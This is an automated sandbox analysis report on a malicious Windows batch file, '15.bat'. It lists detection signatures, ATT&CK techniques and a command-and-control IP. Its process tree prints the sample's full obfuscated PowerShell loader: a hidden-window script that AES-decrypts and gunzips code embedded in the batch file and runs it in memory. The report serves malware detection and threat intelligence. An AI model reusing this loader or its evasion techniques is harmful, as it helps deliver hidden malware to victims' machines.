Windows
Analysis Report
15.bat
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- cmd.exe (PID: 6264 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\15.ba t" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6244 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6556 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\Desk top\15.bat " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6336 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho $host.U I.RawUI.Wi ndowTitle= 'C:\Users\ user\Deskt op\15.bat' ;$MMJz='Ge lYestClYes urlYesrenl YestlYesPr olYesceslY esslYes'.R eplace('lY es', ''),' ChFGxTanFG xTgFGxTeEF GxTxFGxTte FGxTnsFGxT iFGxToFGxT nFGxT'.Rep lace('FGxT ', ''),'El eTQWBmeTQW BnTQWBtAtT QWB'.Repla ce('TQWB', ''),'CrAF GseAFGsaAF GstAFGseAF GsDecAFGsr yAFGsptAFG sorAFGs'.R eplace('AF Gs', ''),' SRlYbpRlYb lRlYbiRlYb tRlYb'.Rep lace('RlYb ', ''),'Do aAnecooaAn mpoaAnreso aAnsoaAn'. Replace('o aAn', ''), 'EnHILctrH ILcyHILcPo HILcinHILc tHILc'.Rep lace('HILc ', ''),'CD YnropDYnry ToDYnr'.Re place('DYn r', ''),'R eaOApIdLiO ApInesOApI '.Replace( 'OApI', '' ),'IndQRQv odQRQkedQR Q'.Replace ('dQRQ', ' '),'Tratgl InstglIfot glIrmtglIF itglInatgl IlBltglIot glIctglIkt glI'.Repla ce('tglI', ''),'MbkB waibkBwnbk BwModbkBwu lbkBwebkBw '.Replace( 'bkBw', '' ),'FroXggo oXggmBaoXg gseoXgg64S oXggtroXgg ioXggngoXg g'.Replace ('oXgg', ' '),'Loajyr jdjyrj'.Re place('jyr j', '');po wershell - w hidden;f unction FB ejp($JKmLP ){$UerdI=[ System.Sec urity.Cryp tography.A es]::Creat e();$UerdI .Mode=[Sys tem.Securi ty.Cryptog raphy.Ciph erMode]::C BC;$UerdI. Padding=[S ystem.Secu rity.Crypt ography.Pa ddingMode] ::PKCS7;$U erdI.Key=[ System.Con vert]::($M MJz[12])(' dVsAn8RIci GbSq5PEUSf fnRQiEF7D6 JhJ+MhQGAx pxA=');$Ue rdI.IV=[Sy stem.Conve rt]::($MMJ z[12])('rr Mf8DdSiOTk JYW5AhOOlg ==');$ytGV g=$UerdI.( $MMJz[3])( );$FTQFX=$ ytGVg.($MM Jz[10])($J KmLP,0,$JK mLP.Length );$ytGVg.D ispose();$ UerdI.Disp ose();$FTQ FX;}functi on mpyCC($ JKmLP){$Fj jxJ=New-Ob ject Syste m.IO.Memor yStream(,$ JKmLP);$sy SFb=New-Ob ject Syste m.IO.Memor yStream;$R dfpf=New-O bject Syst em.IO.Comp ression.GZ ipStream($ FjjxJ,[IO. Compressio n.Compress ionMode]:: ($MMJz[5]) );$Rdfpf.( $MMJz[7])( $sySFb);$R dfpf.Dispo se();$Fjjx J.Dispose( );$sySFb.D ispose();$ sySFb.ToAr ray();}$Bk lLD=[Syste m.IO.File] ::($MMJz[8 ])([Consol e]::Title) ;$oNBKh=mp yCC (FBejp ([Convert ]::($MMJz[ 12])([Syst em.Linq.En umerable]: :($MMJz[2] )($BklLD, 5).Substri ng(2))));$ HuDRY=mpyC C (FBejp ( [Convert]: :($MMJz[12 ])([System .Linq.Enum erable]::( $MMJz[2])( $BklLD, 6) .Substring (2))));[Sy stem.Refle ction.Asse mbly]::($M MJz[13])([ byte[]]$Hu DRY).($MMJ z[6]).($MM Jz[9])($nu ll,$null); [System.Re flection.A ssembly]:: ($MMJz[13] )([byte[]] $oNBKh).($ MMJz[6]).( $MMJz[9])( $null,$nul l); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 5868 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 6456 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
System Summary |
---|
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp: | 04/20/24-10:06:05.477978 |
SID: | 2850454 |
Source Port: | 4449 |
Destination Port: | 49730 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
AV Detection |
---|
Source: | URL Reputation: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | Snort IDS: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 6_2_00007FFD9B8A6E30 | |
Source: | Code function: | 6_2_00007FFD9B8AF8D8 | |
Source: | Code function: | 6_2_00007FFD9B8AF50D | |
Source: | Code function: | 6_2_00007FFD9B8BDCA0 |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Process created: |
Source: | WMI Queries: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 6_2_00007FFD9B8A4C69 | |
Source: | Code function: | 6_2_00007FFD9B8B095E | |
Source: | Code function: | 6_2_00007FFD9B8A786D |
Source: | Key value created or modified: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | WMI Queries: |
Source: | Last function: |
Source: | File Volume queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | WMI Queries: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 131 Windows Management Instrumentation | 1 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 14 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 11 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Modify Registry | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 151 Virtualization/Sandbox Evasion | Security Account Manager | 151 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 23 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | |||
5% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | URL Reputation | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
true |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.222.96.128 | unknown | Germany | 3303 | SWISSCOMSwisscomSwitzerlandLtdCH | true |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1429038 |
Start date and time: | 2024-04-20 10:05:06 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 53s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 11 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 15.bat |
Detection: | MAL |
Classification: | mal68.evad.winBAT@11/10@0/1 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 72.21.81.240
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
Time | Type | Description |
---|---|---|
10:05:57 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
